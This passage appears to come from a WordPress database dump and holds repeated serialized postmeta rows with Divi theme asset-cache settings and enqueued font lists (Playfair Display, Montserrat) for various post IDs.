00,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32571,1256,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32563,1110,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32564,1110,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32565,1110,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32566,1110,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32567,1657,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32559,1431,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32560,1431,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32561,1431,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32562,1431,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32551,1374,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32552,1374,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32553,1374,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32554,1374,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32555,1424,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32556,1424,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32557,1424,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32558,1424,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32547,593,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32548,593,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32549,593,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32550,593,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32543,679,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32544,679,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32545,679,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32546,679,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32542,984,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32539,984,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32540,984,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32541,984,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32535,580,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32536,580,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32537,580,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32538,580,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32531,1529,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32532,1529,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32533,1529,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32534,1529,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32529,730,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32530,730,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32522,1596,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32523,1636,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32524,1636,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32525,1636,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32526,1636,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32527,730,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32528,730,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32518,740,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32519,1596,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32520,1596,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32521,1596,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32513,1594,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32514,1319,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32515,740,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32516,740,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32517,740,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13: